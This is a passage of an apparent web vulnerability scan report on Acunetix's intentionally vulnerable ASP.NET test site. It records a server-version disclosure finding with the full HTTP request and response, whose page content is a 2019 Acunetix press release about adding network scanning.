XByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNw4dcQo8tH//aNq1Q9scKgXRi5G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html
Method	GET
Parameter
Attack
Evidence	Microsoft-IIS/8.5
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:03 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=0&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnN